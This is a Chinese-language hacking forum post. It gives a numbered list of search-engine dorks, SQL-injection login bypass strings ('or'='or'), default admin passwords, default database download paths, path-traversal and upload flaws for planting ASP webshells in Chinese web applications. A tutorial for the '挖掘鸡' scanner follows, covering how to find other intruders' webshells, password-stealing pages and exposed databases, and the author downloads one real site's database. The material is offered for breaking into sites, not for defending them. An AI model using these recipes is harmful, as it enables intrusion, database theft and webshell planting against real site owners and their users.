1、到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!
2、到Google ,site:cq inurl:asp
3、利用挖掘鸡和一个ASP木马. 文件名是login.asp 路径组是/manage/ 关键词是went.asp 用'or'='or'来登陆
4、关键字:Co Net MIB Ver 1.0网站后台管理系统帐号密码为 'or'='or'
5、动感购物系统 inurl:help.asp登陆,如未注册成为会员! upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞
6、默认数据库地址blogdata/acblog.asa 关键字:acblog
7、百度 /htdocs 注册里可以直接上传asa文件!
8、/Database/#newasp.mdb 关键词:NewAsp SiteManageSystem Version
9、用挖掘机 关键字:Powered by WEBBOY 页面:/upfile.asp
10. baidu中搜索关键字Ver5.0 Build 0519 (存在上传漏洞)
11. Upfile_Article.asp bbs/upfile.asp 输入关键字:powered by mypower ,
12. inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以到很多网站
13. 现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp
14. 键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛挖掘鸡的关键字 添 setup.asp
15. VBulletin论坛的数据库默认数据库地址! /includes/functions.php 工具: 1.网站猎手 下载地址:百度 Google! 2.Google 关键字: Powered by: vBulletin Version 3.0.1 Powered by: vBulletin Version 3.0.2 Powered by: vBulletin Version 3.0.3 其中一个就可以了
16. 1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart open source。 这是一个商场系统。 2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~ 猜到,comersus.mdb. 是数据库名数据库都是放在database/ 后的, 所以database/comersus.mdb comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。那样把前一个''store/''除去,再加上database/comersus.mdb 试试
17. 无忧传奇官方站点程序。 1、后台管理地址:您的域名/msmiradmin/ 2、默认后台管理帐号:
msmir 3、默认后台管理密码:msmirmsmir 数据库文件为 您的域名/msmirdata/msmirArticle.mdb 数据库连接文件为 ***********/Conn.asp
18. 百度里输入/skins/default/
19. 利用挖掘机关键机:power by Discuz 路径:/wish.php 配合: Discuz!论坛 wish.php远程包含漏洞 工具使用
20. 上传漏洞. 工具 : Domain3.5 网站猎手 1.5版关键字powered by mypower 检测的页面或文件插入upfile_photo.asp
21. 新云漏洞这个漏洞ACCESS和SQL版通吃。 Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录" 把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp 以源码,软件等下载站居多。大家时常碰到数据库如果前面或者中间+了# 可
以用%23替换就可以下载了 \database\%23newasp.mdb 如:#xzws.mdb 改成%23xzws.mdb
22. 通吃所有商城+动力上传系统使用工具:挖掘鸡 v1.1 明小子商城入侵: 关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->
完成漏洞页面:upload.asp upfile_flash.asp 动力入侵: 关键字:powered by mypower 漏洞页面:upfile_photo.asp Upfile_Soft.asp upfile_adpic.asp upfile_softpic.asp
23、动易列目录 admin_articlerecyclebin.asp inurl:admin_articlerecyclebin.asp
24、工具:网站猎手关键词:inurl:Went.asp 后缀:manage/login.asp 口令:'or'='or'
25、入侵魔兽私服需要的工具:ASP木马一只。 Domain3.5明小子关键字:All Right Reserved Design:游戏联盟后台地址:admin/login.asp 数据库的地址:chngame/#chngame.mdb
26、漏洞是利用管理员iis设置的失误用baidu 关键字就是比较罕见的脚本名动网: ReloadForumCache.asp Leadbbs: makealltopanc.asp BBSXP: admin_fso.asp 动易: admin_articlerecyclebin.asp
27、国外站的爆库漏洞关键字:sad Raven's Guestbook 密码地址:/passwd.dat 后台地址:/admin.php
28、 关键字:尚奈克斯后台路径/system/manage.asp 直接传ASP木马
29、 工具 1:网站猎手 2:大马一个关键字:切勿关闭Cookies功能,否则您将不能登录插入diy.asp
30、关键字:Team5 Studio All rights reserved 默认数据库:data/team.mdb
31. 工具: 挖掘机 辅臣数据库读取器关键字: 企业简介 产品展示 产品列表后缀添加: /database/myszw.mdb 后台地址: admin/Login.asp
32. 关键子 XXX inurl:Nclass.asp 在"系统设置"里写个木马。会被保存到 在 config.asp内。
33. 不进后台照样拿动网WEBSHELL data.asp?action=BackupData 动网数据库备份默认路径 36. 工具:网站猎手 WebShell 关键字:inurl:Went.asp 后缀:manage/login.asp 弱口令:'or'='or'
34、 入侵雷池新闻发布系统关键字:leichinews 去掉leichinews后面的. 打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp 再上传马..... 进访问uppic anran.asp 登陆马.
35. 一、通过GOOGLE搜索大量注入点关键字:asp?id=1 gov.jp/ asp?id= 页数:100 语言:想入侵哪个国家就填什么语言吧
36. 关键字:Powered by:94KKBBS 2005 利用密码回功能 回admin 提问:ddddd 回答:ddddd
37. 关键字:****** inurl:readnews.asp 把最后一个/改成%5c ,直接暴库,看密码,进后台随便添加个新闻 在标题输入我们的一句话木马
38. 工具:一句话木马 BBsXp 5.0 sp1 管理员猜解器关键词:powered by bbsxp5.00 进后台,备份一句话马!
39. 关键字:程序核心:BJXSHOP网上开店专家 后台:/admin
挖掘鸡使用教程
赞助商链接图片:
这是添加新分类!图片!
写这个帖子的目的主要是介绍这款软件,自己也是刚刚接触,我也是菜鸟!所
以就把我们菜鸟的使用方法简单介绍下,以后我们一块研究它的用途.用好它绝对会对我们有很大的帮助!
挖掘鸡是干什么使的
  一些黑客及黑客软件(包括网站管理员及管理员工具)会在网站生成特定路径(目录名+文件名),这些路径往往有习惯性及默认性。这样的路径在网络中孤立无链接,通过搜索引擎很难直接搜索到。挖掘鸡就是针对这样的路径进行扫描来获取敏感信息或webshell等权限。
比如常见木马上传文件名:明小子旁注在网站/或/bbs/下默认上传diy.asp,内容为简单的上传shell,密
码为空;再如常见qq密码信文件名:阿拉QQ大盗在网站/下默认上传tmdqq.asp,用于接收密码信并存到同路径的qq.txt中。
现在也许我们还不了解其实质!但是我们只要慢慢来用!一定会摸索到的!
使用说明:
挖掘鸡是否正常工作?:
  挖掘鸡使用其实很简单,不过因为有些后缀存在较少,长时间挖不到结果,导致大家对自己的使用方法产生怀疑。
  这里提供验证挖掘鸡正常工作的方法:勾选index.asp后缀(列表中没有的话,可通过"在线更新后缀"功能获取或手工添加),关键词可不填,点开始(≥)后数分钟内如果能挖到结果,就说明挖掘鸡正常工作中,唯一缺的就是耐心了和更多更有效的后缀了。如图
初级用法:
勾选想要挖的后缀(建议不要太多,1-2个就行),点开始(≥)即可(关键词留空的话程序会自动选择热门关键词)。这个不常用!一般都是自己添加后缀!
中级用法:
后缀:
1、怎么添加后缀?:右键选添加,在空白行上时自动添加新分类,在数据行上时自动添加新后缀。
2、后缀的各字段是什么含义?:
文件名:diy.asp
路径组:/,/bbs/
特征字串:绝对路径(包括文件名:如
上面这个后缀直接组合(文件名分别和路径组中美一个路径组合)并附加在目标域名xxx 后面,形成URL:xxx/diy.asp, xxx/bbs/diy.asp, 如果URL存在则进一步判断返回页面中是否存在特征字串“绝对路径(包括文件名:如”,如果包含(存在无密码上传webshell)则返回挖掘成果.
在这是添加的database/datashop.mdb 也就是默认数据库的位置,为以后拿后面的shell做准备!这是扫描结果!如图
关键词:
1、如果想不到独特的关键词则不如留空,让挖掘鸡随机产生关键词。比如qq、免费空间等常见词大家都在扫,反而会限制挖掘范围,挖掘结果也会类似。尤其用肉鸡长时间大范围扫描的话,毕竟针对某关键词的页面是有限的,很快就会重复,建议留空。
2、扫SQLinj等基于文件名的后缀时(一般后缀是基于路径的),关键词最好用前缀来限定一下,比如inurl:asp
关键词 (兼容baidu,google语法),保证目标网址是xxx/xxx.asp?id=x 的形式,提高挖掘效率。
线程数:
一般ADSL用户推荐20-50线程,挖掘时状态栏有扫每个链接的平均耗时,可以根据它来决定是否增加线程。(论坛有投票帖,大家可以针对自己的联网方式比较一下)。
词频:
关键词不为空时,词频建议取最小值(10),这样结果页面相关度比较高;
关键词为空时,建议不要取缺省值(20),并且在保证自己取值独特性的基础上尽量取小,比如13。
高级用法:asp资讯网站源码
1、不要用来扫QQ,扫QQ只是挖掘鸡最简单的一个应用。
2、自己添加后缀的技巧:
  挖掘鸡的后缀有限,虽然能时常在线更新后缀,但是毕竟所有人都在扫(很多人扫到以后还会改名以独享扫描结果),效率不是很高。自行添加后缀才能真正的让挖掘鸡为你服务。比如刚想到servu.asp时随便一个扫描结果就是一个3389肉鸡。
  添加哪些后缀要看自己的想象力和对热门黑客及管理员的熟悉程度,主要靠自己相关知识的累积(从这个意义上来说,挖掘鸡绝不仅仅是菜鸟工具),唯一能说说的是特征字串的选择。
3、特征字串的选择技巧:
  每个后缀都有一个叫特征字串的字段,它是从目标页面中截取出来的字符串片断(不区分大小写),用于过滤其他无关的同名文件,比如扫qq.asp,不添加特征字串的话,会挖到很多qq在线克服的页面,而正常收qq信的qq.asp的内容是:Send OK!(通过察看页面源文件获得),截取页面内容中独特的部分(
同名路径中不会存在的)作为特征字串,就可以大大提高结果的准确性。不会选取的可以对照扫描结果看看挖掘鸡内置的后缀是怎么指定特征字串的。对于无法指定特征字串的后缀(比如rar、mdb等文件),建议勾选高级选项中的忽略特征码列表(网页中包含列表中字串的扫描结果将被忽略,比如防盗链系统),防止误报。
  同一个后缀要指定多种特征字串时,用_|_分割,表示或的关系。特征字串以/g等结束,代表使用正则表达式匹配。
  建议大家对相关的热门软件多试用多思考,发掘出属于自己的后缀(能共享更好)。(有不少人看qq.txt好扫就想当然添加qq.asp等(而且特征字串也不改),这样没有软件依据的添加后缀,不会挖到很多结果的。)
差不多就这些了!今天我扫的是database/dateshop.mdb,意思也就是网站有这个数据库路径的都会被挖掘鸡扫出来!
我把扫描结果的随便有个是www.ajxd/datebase/dateshop.mdb这样的
好!我们可以把网址输入地址栏看看能不能下载,我试了是可以下载的如图

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。